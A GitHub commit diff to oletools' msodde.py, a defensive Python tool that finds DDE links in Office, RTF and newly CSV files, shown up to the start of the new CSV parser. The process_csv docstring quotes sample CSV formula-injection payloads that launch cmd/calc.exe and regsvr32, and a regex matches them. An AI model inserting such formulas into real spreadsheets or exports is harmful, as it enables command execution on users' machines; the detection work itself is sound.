Commit 95ca88d297935a2de9175b92152713b64d3f6e6c

Authored by Philippe Lagadec
Committed by GitHub
2 parents 56ed93a1 874a5105

Merge pull request #241 from christian-intra2net/dde-in-csv

Dde in csv
oletools/msodde.py
... ... @@ -9,6 +9,7 @@ Supported formats:
9 9 - Word 97-2003 (.doc, .dot), Word 2007+ (.docx, .dotx, .docm, .dotm)
10 10 - Excel 97-2003 (.xls), Excel 2007+ (.xlsx, .xlsm, .xlsb)
11 11 - RTF
  12 +- CSV (exported from / imported into Excel)
12 13  
13 14 Author: Philippe Lagadec - http://www.decalage.info
14 15 License: BSD, see source code or documentation
... ... @@ -17,39 +18,72 @@ msodde is part of the python-oletools package:
17 18 http://www.decalage.info/python/oletools
18 19 """
19 20  
20   -# === LICENSE ==================================================================
  21 +# === LICENSE =================================================================
21 22  
22 23 # msodde is copyright (c) 2017 Philippe Lagadec (http://www.decalage.info)
23 24 # All rights reserved.
24 25 #
25   -# Redistribution and use in source and binary forms, with or without modification,
26   -# are permitted provided that the following conditions are met:
  26 +# Redistribution and use in source and binary forms, with or without
  27 +# modification, are permitted provided that the following conditions are met:
27 28 #
28   -# * Redistributions of source code must retain the above copyright notice, this
29   -# list of conditions and the following disclaimer.
  29 +# * Redistributions of source code must retain the above copyright notice,
  30 +# this list of conditions and the following disclaimer.
30 31 # * Redistributions in binary form must reproduce the above copyright notice,
31 32 # this list of conditions and the following disclaimer in the documentation
32 33 # and/or other materials provided with the distribution.
33 34 #
34   -# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
35   -# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
36   -# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
37   -# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
38   -# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
39   -# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
40   -# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
41   -# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
42   -# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
43   -# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
  35 +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  36 +# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  37 +# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
  38 +# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
  39 +# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
  40 +# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
  41 +# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
  42 +# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
  43 +# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
  44 +# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
  45 +# POSSIBILITY OF SUCH DAMAGE.
  46 +
  47 +# -- IMPORTS ------------------------------------------------------------------
44 48  
45 49 from __future__ import print_function
46 50  
47   -#------------------------------------------------------------------------------
  51 +import argparse
  52 +import zipfile
  53 +import os
  54 +from os.path import abspath, dirname
  55 +import sys
  56 +import json
  57 +import logging
  58 +import re
  59 +import csv
  60 +
  61 +# import lxml or ElementTree for XML parsing:
  62 +try:
  63 + # lxml: best performance for XML processing
  64 + import lxml.etree as ET
  65 +except ImportError:
  66 + import xml.etree.cElementTree as ET
  67 +
  68 +# little hack to allow absolute imports even if oletools is not installed
  69 +# Copied from olevba.py
  70 +PARENT_DIR = dirname(dirname(abspath(__file__)))
  71 +if PARENT_DIR not in sys.path:
  72 + sys.path.insert(0, PARENT_DIR)
  73 +del PARENT_DIR
  74 +
  75 +from oletools.thirdparty import olefile
  76 +from oletools import ooxml
  77 +from oletools import xls_parser
  78 +from oletools import rtfobj
  79 +
  80 +# -----------------------------------------------------------------------------
48 81 # CHANGELOG:
49 82 # 2017-10-18 v0.52 PL: - first version
50 83 # 2017-10-20 PL: - fixed issue #202 (handling empty xml tags)
51 84 # 2017-10-23 ES: - add check for fldSimple codes
52   -# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE strings together
  85 +# 2017-10-24 ES: - group tags and track begin/end tags to keep DDE
  86 +# strings together
53 87 # 2017-10-25 CH: - add json output
54 88 # 2017-10-25 CH: - parse doc
55 89 # PL: - added logging
... ... @@ -59,10 +93,11 @@ from __future__ import print_function
59 93 # 2017-11-29 CH: - added support for xlsb files
60 94 # 2017-11-29 PL: - added support for RTF files (issue #223)
61 95 # 2017-12-07 CH: - ensure rtf file is closed
  96 +# 2018-01-05 CH: - add CSV
62 97  
63   -__version__ = '0.52dev9'
  98 +__version__ = '0.52dev10'
64 99  
65   -#------------------------------------------------------------------------------
  100 +# -----------------------------------------------------------------------------
66 101 # TODO: field codes can be in headers/footers/comments - parse these
67 102 # TODO: generalize behaviour for xlsx: find all external links (maybe rename
68 103 # command line flag for "blacklist" to "find all suspicious" or so)
... ... @@ -71,40 +106,10 @@ __version__ = '0.52dev9'
71 106 # DDE-Links
72 107 # TODO: avoid reading complete rtf file data into memory
73 108  
74   -#------------------------------------------------------------------------------
  109 +# -----------------------------------------------------------------------------
75 110 # REFERENCES:
76 111  
77 112  
78   -#--- IMPORTS ------------------------------------------------------------------
79   -
80   -import argparse
81   -import zipfile
82   -import os
83   -import sys
84   -import json
85   -import logging
86   -import re
87   -from struct import unpack
88   -
89   -# import lxml or ElementTree for XML parsing:
90   -try:
91   - # lxml: best performance for XML processing
92   - import lxml.etree as ET
93   -except ImportError:
94   - import xml.etree.cElementTree as ET
95   -
96   -# little hack to allow absolute imports even if oletools is not installed
97   -# Copied from olevba.py
98   -_thismodule_dir = os.path.normpath(os.path.abspath(os.path.dirname(__file__)))
99   -_parent_dir = os.path.normpath(os.path.join(_thismodule_dir, '..'))
100   -if not _parent_dir in sys.path:
101   - sys.path.insert(0, _parent_dir)
102   -
103   -from oletools.thirdparty import olefile
104   -from oletools import ooxml
105   -from oletools import xls_parser
106   -from oletools import rtfobj
107   -
108 113 # === PYTHON 2+3 SUPPORT ======================================================
109 114  
110 115 if sys.version_info[0] >= 3:
... ... @@ -123,7 +128,9 @@ TAG_W_P = "{%s}p" % NS_WORD
123 128 TAG_W_R = "{%s}r" % NS_WORD
124 129 ATTR_W_INSTR = '{%s}instr' % NS_WORD
125 130 ATTR_W_FLDCHARTYPE = '{%s}fldCharType' % NS_WORD
126   -LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/header1.xml','word/footer1.xml','word/header2.xml','word/footer2.xml','word/comments.xml']
  131 +LOCATIONS = ('word/document.xml', 'word/endnotes.xml', 'word/footnotes.xml',
  132 + 'word/header1.xml', 'word/footer1.xml', 'word/header2.xml',
  133 + 'word/footer2.xml', 'word/comments.xml')
127 134  
128 135 # list of acceptable, harmless field instructions for blacklist field mode
129 136 # c.f. http://officeopenxml.com/WPfieldInstructions.php or the official
... ... @@ -133,73 +140,74 @@ LOCATIONS = ['word/document.xml','word/endnotes.xml','word/footnotes.xml','word/
133 140 # switches_with_args, switches_without_args, format_switches)
134 141 FIELD_BLACKLIST = (
135 142 # date and time:
136   - ('CREATEDATE', 0, 0, '', 'hs', 'datetime'),
137   - ('DATE', 0, 0, '', 'hls', 'datetime'),
138   - ('EDITTIME', 0, 0, '', '', 'numeric'),
139   - ('PRINTDATE', 0, 0, '', 'hs', 'datetime'),
140   - ('SAVEDATE', 0, 0, '', 'hs', 'datetime'),
141   - ('TIME', 0, 0, '', '', 'datetime'),
  143 + ('CREATEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  144 + ('DATE', 0, 0, '', 'hls', 'datetime'), # pylint: disable=bad-whitespace
  145 + ('EDITTIME', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  146 + ('PRINTDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  147 + ('SAVEDATE', 0, 0, '', 'hs', 'datetime'), # pylint: disable=bad-whitespace
  148 + ('TIME', 0, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
142 149 # exclude document automation (we hate the "auto" in "automation")
143 150 # (COMPARE, DOCVARIABLE, GOTOBUTTON, IF, MACROBUTTON, PRINT)
144 151 # document information
145   - ('AUTHOR', 0, 1, '', '', 'string'),
146   - ('COMMENTS', 0, 1, '', '', 'string'),
147   - ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'),
148   - ('FILENAME', 0, 0, '', 'p', 'string'),
149   - ('FILESIZE', 0, 0, '', 'km', 'numeric'),
150   - ('KEYWORDS', 0, 1, '', '', 'string'),
151   - ('LASTSAVEDBY', 0, 0, '', '', 'string'),
152   - ('NUMCHARS', 0, 0, '', '', 'numeric'),
153   - ('NUMPAGES', 0, 0, '', '', 'numeric'),
154   - ('NUMWORDS', 0, 0, '', '', 'numeric'),
155   - ('SUBJECT', 0, 1, '', '', 'string'),
156   - ('TEMPLATE', 0, 0, '', 'p', 'string'),
157   - ('TITLE', 0, 1, '', '', 'string'),
  152 + ('AUTHOR', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  153 + ('COMMENTS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  154 + ('DOCPROPERTY', 1, 0, '', '', 'string/numeric/datetime'), # pylint: disable=bad-whitespace
  155 + ('FILENAME', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
  156 + ('FILESIZE', 0, 0, '', 'km', 'numeric'), # pylint: disable=bad-whitespace
  157 + ('KEYWORDS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  158 + ('LASTSAVEDBY', 0, 0, '', '', 'string'), # pylint: disable=bad-whitespace
  159 + ('NUMCHARS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  160 + ('NUMPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  161 + ('NUMWORDS', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  162 + ('SUBJECT', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  163 + ('TEMPLATE', 0, 0, '', 'p', 'string'), # pylint: disable=bad-whitespace
  164 + ('TITLE', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
158 165 # equations and formulas
159   - # exlude '=' formulae because they have different syntax
160   - ('ADVANCE', 0, 0, 'dlruxy', '', ''),
161   - ('SYMBOL', 1, 0, 'fs', 'ahju', ''),
  166 + # exlude '=' formulae because they have different syntax (and can be bad)
  167 + ('ADVANCE', 0, 0, 'dlruxy', '', ''), # pylint: disable=bad-whitespace
  168 + ('SYMBOL', 1, 0, 'fs', 'ahju', ''), # pylint: disable=bad-whitespace
162 169 # form fields
163   - ('FORMCHECKBOX', 0, 0, '', '', ''),
164   - ('FORMDROPDOWN', 0, 0, '', '', ''),
165   - ('FORMTEXT', 0, 0, '', '', ''),
  170 + ('FORMCHECKBOX', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  171 + ('FORMDROPDOWN', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  172 + ('FORMTEXT', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
166 173 # index and tables
167   - ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''),
  174 + ('INDEX', 0, 0, 'bcdefghklpsz', 'ry', ''), # pylint: disable=bad-whitespace
168 175 # exlude RD since that imports data from other files
169   - ('TA', 0, 0, 'clrs', 'bi', ''),
170   - ('TC', 1, 0, 'fl', 'n', ''),
171   - ('TOA', 0, 0, 'bcdegls', 'fhp', ''),
172   - ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''),
173   - ('XE', 1, 0, 'frty', 'bi', ''),
  176 + ('TA', 0, 0, 'clrs', 'bi', ''), # pylint: disable=bad-whitespace
  177 + ('TC', 1, 0, 'fl', 'n', ''), # pylint: disable=bad-whitespace
  178 + ('TOA', 0, 0, 'bcdegls', 'fhp', ''), # pylint: disable=bad-whitespace
  179 + ('TOC', 0, 0, 'abcdflnopst', 'huwxz', ''), # pylint: disable=bad-whitespace
  180 + ('XE', 1, 0, 'frty', 'bi', ''), # pylint: disable=bad-whitespace
174 181 # links and references
175 182 # exclude AUTOTEXT and AUTOTEXTLIST since we do not like stuff with 'AUTO'
176   - ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''),
177   - ('CITATION', 1, 0, 'lfspvm', 'nty', ''),
  183 + ('BIBLIOGRAPHY', 0, 0, 'lfm', '', ''), # pylint: disable=bad-whitespace
  184 + ('CITATION', 1, 0, 'lfspvm', 'nty', ''), # pylint: disable=bad-whitespace
178 185 # exclude HYPERLINK since we are allergic to URLs
179 186 # exclude INCLUDEPICTURE and INCLUDETEXT (other file or maybe even URL?)
180 187 # exclude LINK and REF (could reference other files)
181   - ('NOTEREF', 1, 0, '', 'fhp', ''),
182   - ('PAGEREF', 1, 0, '', 'hp', ''),
183   - ('QUOTE', 1, 0, '', '', 'datetime'),
184   - ('STYLEREF', 1, 0, '', 'lnprtw', ''),
  188 + ('NOTEREF', 1, 0, '', 'fhp', ''), # pylint: disable=bad-whitespace
  189 + ('PAGEREF', 1, 0, '', 'hp', ''), # pylint: disable=bad-whitespace
  190 + ('QUOTE', 1, 0, '', '', 'datetime'), # pylint: disable=bad-whitespace
  191 + ('STYLEREF', 1, 0, '', 'lnprtw', ''), # pylint: disable=bad-whitespace
185 192 # exclude all Mail Merge commands since they import data from other files
186 193 # (ADDRESSBLOCK, ASK, COMPARE, DATABASE, FILLIN, GREETINGLINE, IF,
187 194 # MERGEFIELD, MERGEREC, MERGESEQ, NEXT, NEXTIF, SET, SKIPIF)
188 195 # Numbering
189   - ('LISTNUM', 0, 1, 'ls', '', ''),
190   - ('PAGE', 0, 0, '', '', 'numeric'),
191   - ('REVNUM', 0, 0, '', '', ''),
192   - ('SECTION', 0, 0, '', '', 'numeric'),
193   - ('SECTIONPAGES', 0, 0, '', '', 'numeric'),
194   - ('SEQ', 1, 1, 'rs', 'chn', 'numeric'),
195   - # user information
196   - ('USERADDRESS', 0, 1, '', '', 'string'),
197   - ('USERINITIALS', 0, 1, '', '', 'string'),
198   - ('USERNAME', 0, 1, '', '', 'string'),
  196 + ('LISTNUM', 0, 1, 'ls', '', ''), # pylint: disable=bad-whitespace
  197 + ('PAGE', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  198 + ('REVNUM', 0, 0, '', '', ''), # pylint: disable=bad-whitespace
  199 + ('SECTION', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  200 + ('SECTIONPAGES', 0, 0, '', '', 'numeric'), # pylint: disable=bad-whitespace
  201 + ('SEQ', 1, 1, 'rs', 'chn', 'numeric'), # pylint: disable=bad-whitespace
  202 + # user information # pylint: disable=bad-whitespace
  203 + ('USERADDRESS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  204 + ('USERINITIALS', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
  205 + ('USERNAME', 0, 1, '', '', 'string'), # pylint: disable=bad-whitespace
199 206 )
200 207  
201 208 FIELD_DDE_REGEX = re.compile(r'^\s*dde(auto)?\s+', re.I)
202 209  
  210 +# filter modes
203 211 FIELD_FILTER_DDE = 'only dde'
204 212 FIELD_FILTER_BLACKLIST = 'exclude blacklisted'
205 213 FIELD_FILTER_ALL = 'keep all'
... ... @@ -229,6 +237,7 @@ LOG_LEVELS = {
229 237 'critical': logging.CRITICAL
230 238 }
231 239  
  240 +
232 241 class NullHandler(logging.Handler):
233 242 """
234 243 Log Handler without output, to avoid printing messages if logging is not
... ... @@ -239,6 +248,7 @@ class NullHandler(logging.Handler):
239 248 def emit(self, record):
240 249 pass
241 250  
  251 +
242 252 def get_logger(name, level=logging.CRITICAL+1):
243 253 """
244 254 Create a suitable logger object for this module.
... ... @@ -251,7 +261,7 @@ def get_logger(name, level=logging.CRITICAL+1):
251 261 # First, test if there is already a logger with the same name, else it
252 262 # will generate duplicate messages (due to duplicate handlers):
253 263 if name in logging.Logger.manager.loggerDict:
254   - #NOTE: another less intrusive but more "hackish" solution would be to
  264 + # NOTE: another less intrusive but more "hackish" solution would be to
255 265 # use getLogger then test if its effective level is not default.
256 266 logger = logging.getLogger(name)
257 267 # make sure level is OK:
... ... @@ -292,8 +302,8 @@ def ensure_stdout_handles_unicode():
292 302 # try to find encoding for sys.stdout
293 303 encoding = None
294 304 try:
295   - encoding = sys.stdout.encoding # variable encoding might not exist
296   - except Exception:
  305 + encoding = sys.stdout.encoding
  306 + except AttributeError: # variable "encoding" might not exist
297 307 pass
298 308  
299 309 if encoding not in (None, '', 'ascii'):
... ... @@ -316,7 +326,8 @@ def ensure_stdout_handles_unicode():
316 326 sys.stdout = wrapper(sys.stdout)
317 327  
318 328  
319   -ensure_stdout_handles_unicode() # e.g. for print(text) in main()
  329 +if sys.version_info.major < 3:
  330 + ensure_stdout_handles_unicode() # e.g. for print(text) in main()
320 331  
321 332  
322 333 # === ARGUMENT PARSING =======================================================
... ... @@ -338,28 +349,34 @@ def existing_file(filename):
338 349  
339 350 def process_args(cmd_line_args=None):
340 351 """ parse command line arguments (given ones or per default sys.argv) """
341   - parser = ArgParserWithBanner(description='A python tool to detect and extract DDE links in MS Office files')
  352 + parser = ArgParserWithBanner(description='A python tool to detect and '
  353 + 'extract DDE links in MS Office files')
342 354 parser.add_argument("filepath", help="path of the file to be analyzed",
343 355 type=existing_file, metavar='FILE')
344 356 parser.add_argument('-j', "--json", action='store_true',
345 357 help="Output in json format. Do not use with -ldebug")
346   - parser.add_argument("--nounquote", help="don't unquote values",action='store_true')
347   - parser.add_argument('-l', '--loglevel', dest="loglevel", action="store", default=DEFAULT_LOG_LEVEL,
348   - help="logging level debug/info/warning/error/critical (default=%(default)s)")
  358 + parser.add_argument("--nounquote", help="don't unquote values",
  359 + action='store_true')
  360 + parser.add_argument('-l', '--loglevel', dest="loglevel", action="store",
  361 + default=DEFAULT_LOG_LEVEL,
  362 + help="logging level debug/info/warning/error/critical "
  363 + "(default=%(default)s)")
349 364 filter_group = parser.add_argument_group(
350   - title='Filter which OpenXML field commands are returned',
351   - description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
352   - '(e.g. .doc). These options are mutually exclusive, last '
353   - 'option found on command line overwrites earlier ones.')
  365 + title='Filter which OpenXML field commands are returned',
  366 + description='Only applies to OpenXML (e.g. docx) and rtf, not to OLE '
  367 + '(e.g. .doc). These options are mutually exclusive, last '
  368 + 'option found on command line overwrites earlier ones.')
354 369 filter_group.add_argument('-d', '--dde-only', action='store_const',
355 370 dest='field_filter_mode', const=FIELD_FILTER_DDE,
356 371 help='Return only DDE and DDEAUTO fields')
357 372 filter_group.add_argument('-f', '--filter', action='store_const',
358   - dest='field_filter_mode', const=FIELD_FILTER_BLACKLIST,
359   - help='Return all fields except harmless ones like PAGE')
  373 + dest='field_filter_mode',
  374 + const=FIELD_FILTER_BLACKLIST,
  375 + help='Return all fields except harmless ones')
360 376 filter_group.add_argument('-a', '--all-fields', action='store_const',
361 377 dest='field_filter_mode', const=FIELD_FILTER_ALL,
362   - help='Return all fields, irrespective of their contents')
  378 + help='Return all fields, irrespective of their '
  379 + 'contents')
363 380 parser.set_defaults(field_filter_mode=FIELD_FILTER_DEFAULT)
364 381  
365 382 return parser.parse_args(cmd_line_args)
... ... @@ -368,16 +385,19 @@ def process_args(cmd_line_args=None):
368 385 # === FUNCTIONS ==============================================================
369 386  
370 387 # from [MS-DOC], section 2.8.25 (PlcFld):
371   -# A field consists of two parts: field instructions and, optionally, a result. All fields MUST begin with
372   -# Unicode character 0x0013 with sprmCFSpec applied with a value of 1. This is the field begin
373   -# character. All fields MUST end with a Unicode character 0x0015 with sprmCFSpec applied with a value
374   -# of 1. This is the field end character. If the field has a result, then there MUST be a Unicode character
375   -# 0x0014 with sprmCFSpec applied with a value of 1 somewhere between the field begin character and
376   -# the field end character. This is the field separator. The field result is the content between the field
377   -# separator and the field end character. The field instructions are the content between the field begin
378   -# character and the field separator, if one is present, or between the field begin character and the field
379   -# end character if no separator is present. The field begin character, field end character, and field
380   -# separator are collectively referred to as field characters.
  388 +# A field consists of two parts: field instructions and, optionally, a result.
  389 +# All fields MUST begin with Unicode character 0x0013 with sprmCFSpec applied
  390 +# with a value of 1. This is the field begin character. All fields MUST end
  391 +# with a Unicode character 0x0015 with sprmCFSpec applied with a value of 1.
  392 +# This is the field end character. If the field has a result, then there MUST
  393 +# be a Unicode character 0x0014 with sprmCFSpec applied with a value of 1
  394 +# somewhere between the field begin character and the field end character. This
  395 +# is the field separator. The field result is the content between the field
  396 +# separator and the field end character. The field instructions are the content
  397 +# between the field begin character and the field separator, if one is present,
  398 +# or between the field begin character and the field end character if no
  399 +# separator is present. The field begin character, field end character, and
  400 +# field separator are collectively referred to as field characters.
381 401  
382 402  
383 403 def process_doc_field(data):
... ... @@ -387,7 +407,6 @@ def process_doc_field(data):
387 407 log.debug('processing field \'{0}\''.format(data))
388 408  
389 409 if data.lstrip().lower().startswith(u'dde'):
390   - #log.debug('--> is DDE!')
391 410 return data
392 411 elif data.lstrip().lower().startswith(u'\x00d\x00d\x00e\x00'):
393 412 return data
... ... @@ -512,7 +531,6 @@ def process_doc(filepath):
512 531 return u'\n'.join(links)
513 532  
514 533  
515   -
516 534 def process_xls(filepath):
517 535 """ find dde links in excel ole file """
518 536  
... ... @@ -531,17 +549,15 @@ def process_xls(filepath):
531 549  
532 550  
533 551 def process_docx(filepath, field_filter_mode=None):
  552 + """ find dde-links (and other fields) in Word 2007+ files """
534 553 log.debug('process_docx')
535 554 all_fields = []
536   - with zipfile.ZipFile(filepath) as z:
537   - for filepath in z.namelist():
  555 + with zipfile.ZipFile(filepath) as zipper:
  556 + for filepath in zipper.namelist():
538 557 if filepath in LOCATIONS:
539   - data = z.read(filepath)
  558 + data = zipper.read(filepath)
540 559 fields = process_xml(data)
541 560 if len(fields) > 0:
542   - #print ('DDE Links in %s:'%filepath)
543   - #for f in fields:
544   - # print(f)
545 561 all_fields.extend(fields)
546 562  
547 563 # apply field command filter
... ... @@ -560,8 +576,10 @@ def process_docx(filepath, field_filter_mode=None):
560 576 .format(field_filter_mode))
561 577  
562 578 return u'\n'.join(clean_fields)
563   -
  579 +
  580 +
564 581 def process_xml(data):
  582 + """ Find dde-links and other fields in office XML data """
565 583 # parse the XML data:
566 584 root = ET.fromstring(data)
567 585 fields = []
... ... @@ -569,39 +587,41 @@ def process_xml(data):
569 587 level = 0
570 588 # find all the tags 'w:p':
571 589 # parse each for begin and end tags, to group DDE strings
572   - # fldChar can be in either a w:r element, floating alone in the w:p or spread accross w:p tags
  590 + # fldChar can be in either a w:r element, floating alone in the w:p
  591 + # or spread accross w:p tags
573 592 # escape DDE if quoted etc
574 593 # (each is a chunk of a DDE link)
575 594  
576 595 for subs in root.iter(TAG_W_P):
577 596 elem = None
578   - for e in subs:
579   - #check if w:r and if it is parse children elements to pull out the first FLDCHAR or INSTRTEXT
580   - if e.tag == TAG_W_R:
581   - for child in e:
582   - if child.tag == TAG_W_FLDCHAR or child.tag == TAG_W_INSTRTEXT:
  597 + for curr_elem in subs:
  598 + # check if w:r; parse children to pull out first FLDCHAR/INSTRTEXT
  599 + if curr_elem.tag == TAG_W_R:
  600 + for child in curr_elem:
  601 + if child.tag == TAG_W_FLDCHAR or \
  602 + child.tag == TAG_W_INSTRTEXT:
583 603 elem = child
584 604 break
585 605 else:
586   - elem = e
587   - #this should be an error condition
  606 + elem = curr_elem
  607 + # this should be an error condition
588 608 if elem is None:
589 609 continue
590   -
591   - #check if FLDCHARTYPE and whether "begin" or "end" tag
  610 +
  611 + # check if FLDCHARTYPE and whether "begin" or "end" tag
592 612 if elem.attrib.get(ATTR_W_FLDCHARTYPE) is not None:
593 613 if elem.attrib[ATTR_W_FLDCHARTYPE] == "begin":
594   - level += 1
  614 + level += 1
595 615 if elem.attrib[ATTR_W_FLDCHARTYPE] == "end":
596 616 level -= 1
597   - if level == 0 or level == -1 : # edge-case where level becomes -1
  617 + if level == 0 or level == -1: # edge-case; level becomes -1
598 618 fields.append(ddetext)
599 619 ddetext = u''
600   - level = 0 # reset edge-case
601   -
  620 + level = 0 # reset edge-case
  621 +
602 622 # concatenate the text of the field, if present:
603 623 if elem.tag == TAG_W_INSTRTEXT and elem.text is not None:
604   - #expand field code if QUOTED
  624 + # expand field code if QUOTED
605 625 ddetext += unquote(elem.text)
606 626  
607 627 for elem in root.iter(TAG_W_FLDSIMPLE):
... ... @@ -611,25 +631,28 @@ def process_xml(data):
611 631  
612 632 return fields
613 633  
614   -def unquote(field):
  634 +
  635 +def unquote(field):
615 636 if "QUOTE" not in field or NO_QUOTES:
616 637 return field
617   - #split into components
  638 + # split into components
618 639 parts = field.strip().split(" ")
619 640 ddestr = ""
620   - for p in parts[1:]:
621   - try:
622   - ch = chr(int(p))
  641 + for part in parts[1:]:
  642 + try:
  643 + character = chr(int(part))
623 644 except ValueError:
624   - ch = p
625   - ddestr += ch
  645 + character = part
  646 + ddestr += character
626 647 return ddestr
627 648  
  649 +
628 650 # "static variables" for field_is_blacklisted:
629 651 FIELD_WORD_REGEX = re.compile(r'"[^"]*"|\S+')
630 652 FIELD_BLACKLIST_CMDS = tuple(field[0].lower() for field in FIELD_BLACKLIST)
631 653 FIELD_SWITCH_REGEX = re.compile(r'^\\[\w#*@]$')
632 654  
  655 +
633 656 def field_is_blacklisted(contents):
634 657 """ Check if given field contents matches any in FIELD_BLACKLIST
635 658  
... ... @@ -651,7 +674,7 @@ def field_is_blacklisted(contents):
651 674 index = FIELD_BLACKLIST_CMDS.index(words[0].lower())
652 675 except ValueError: # first word is no blacklisted command
653 676 return False
654   - log.debug('trying to match "{0}" to blacklist command {0}'
  677 + log.debug('trying to match "{0}" to blacklist command {1}'
655 678 .format(contents, FIELD_BLACKLIST[index]))
656 679 _, nargs_required, nargs_optional, sw_with_arg, sw_solo, sw_format \
657 680 = FIELD_BLACKLIST[index]
... ... @@ -706,14 +729,15 @@ def field_is_blacklisted(contents):
706 729 if 'numeric' in sw_format:
707 730 arg_choices = [] # too many choices to list them here
708 731 else:
709   - log.debug('unexpected switch {0} in "{1}"'.format(switch, contents))
  732 + log.debug('unexpected switch {0} in "{1}"'
  733 + .format(switch, contents))
710 734 return False
711 735  
712 736 # if nothing went wrong sofar, the contents seems to match the blacklist
713 737 return True
714 738  
715 739  
716   -def process_xlsx(filepath, filed_filter_mode=None):
  740 +def process_xlsx(filepath):
717 741 """ process an OOXML excel file (e.g. .xlsx or .xlsb or .xlsm) """
718 742 dde_links = []
719 743 parser = ooxml.XmlParser(filepath)
... ... @@ -733,7 +757,8 @@ def process_xlsx(filepath, filed_filter_mode=None):
733 757 try:
734 758 logging.info('Parsing non-xml subfile {0} with content type {1}'
735 759 .format(subfile, content_type))
736   - for record in xls_parser.parse_xlsb_part(handle, content_type, subfile):
  760 + for record in xls_parser.parse_xlsb_part(handle, content_type,
  761 + subfile):
737 762 logging.debug('{0}: {1}'.format(subfile, record))
738 763 if isinstance(record, xls_parser.XlsbBeginSupBook) and \
739 764 record.link_type == \
... ... @@ -791,8 +816,9 @@ class RtfFieldParser(rtfobj.RtfParser):
791 816  
792 817 RTF_START = b'\x7b\x5c\x72\x74' # == b'{\rt' but does not mess up auto-indent
793 818  
  819 +
794 820 def process_rtf(file_handle, field_filter_mode=None):
795   - log.debug('process_rtf')
  821 + """ find dde links or other fields in rtf file """
796 822 all_fields = []
797 823 data = RTF_START + file_handle.read() # read complete file into memory!
798 824 file_handle.close()
... ... @@ -818,35 +844,119 @@ def process_rtf(file_handle, field_filter_mode=None):
818 844 return u'\n'.join(clean_fields)
819 845  
820 846  
  847 +# threshold when to consider a csv file "small"; also used as sniffing size
  848 +CSV_SMALL_THRESH = 1024
  849 +
  850 +# format of dde link: program-name | arguments ! unimportant
  851 +CSV_DDE_FORMAT = re.compile(r'\s*=(.+)\|(.+)!(.*)\s*')
  852 +
  853 +# allowed delimiters (python sniffer would use nearly any char). Taken from
  854 +# https://data-gov.tw.rpi.edu/wiki/CSV_files_use_delimiters_other_than_commas
  855 +CSV_DELIMITERS = ',\t ;|^'
  856 +
  857 +
  858 +def process_csv(filepath):
  859 + """ find dde in csv text
  860 +
  861 + finds text parts like =cmd|'/k ..\\..\\..\\Windows\\System32\\calc.exe'! or
  862 + =MSEXCEL|'\\..\\..\\..\\Windows\\System32\\regsvr32 [...]
  863 +
  864 + Hoping here that the :py:class:`csv.Sniffer` determines quote and delimiter
  865 + chars the same way that excel does. Tested to some extend in unittests.
  866 +
  867 + This can only find DDE-links, no other "suspicious" constructs (yet).
  868 + """
  869 +
  870 + results = []
  871 + with open(filepath, 'r') as file_handle:
  872 + results, dialect = process_csv_dialect(file_handle, CSV_DELIMITERS)
  873 + is_small = file_handle.tell() < CSV_SMALL_THRESH
